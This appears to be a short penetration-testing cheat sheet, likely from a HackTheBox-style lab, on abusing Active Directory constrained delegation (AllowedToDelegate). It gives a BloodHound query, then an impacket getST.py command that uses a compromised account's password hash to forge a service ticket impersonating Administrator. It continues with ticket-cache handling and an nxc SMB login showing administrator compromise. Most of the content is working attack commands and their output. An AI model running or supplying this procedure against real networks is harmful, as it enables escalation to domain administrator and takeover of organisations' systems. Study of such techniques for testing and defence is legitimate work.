AD Delegation

AllowedToDelegate

Constrained Delegation Privileges

AllowedToDelegate (msds-allowedtodelegateto)

You can list constrained delegation with bloodhound.

MATCH p=()-[r:AllowedToDelegate]->() RETURN p

Open the source node and check the “Allowed To Delegate” SPN value

Then you can impersonate any user on that SPN, in our exampel the SPN is “www/dc.domain.htb”

cd /tmp/
unset KRB5CCNAME
rm *.ccache
getST.py -spn 'www/dc.domain.htb' -impersonate 'Administrator' -hashes ':4c395675187a74271de7c4af867ad417' 'domain.htb/compromised' -dc-ip 10.129.95.154
[...]
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@www_dc.domain.htb@DOMAIN.HTB.ccache
[...]

If you encounter time issue, you can sync with DC ntp

sudo rdate -n dc.domain.htb

Sometimes you can change the initial SPN to the one you want without problem

Using SMB will need the CIFS spn, and WINRM need WSMAN or HTTP.

mv *.ccache adminwww.ccache
export KRB5CCNAME="$(pwd)/adminwww.ccache"
klist "$KRB5CCNAME"

nxc smb dc.domain.htb --use-kcache
SMB         10.129.95.154   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:domain.htb) (signing:True) (SMBv1:False)
SMB         10.129.95.154   445    DC               [+] domain.htb\Administrator from ccache (Pwn3d!)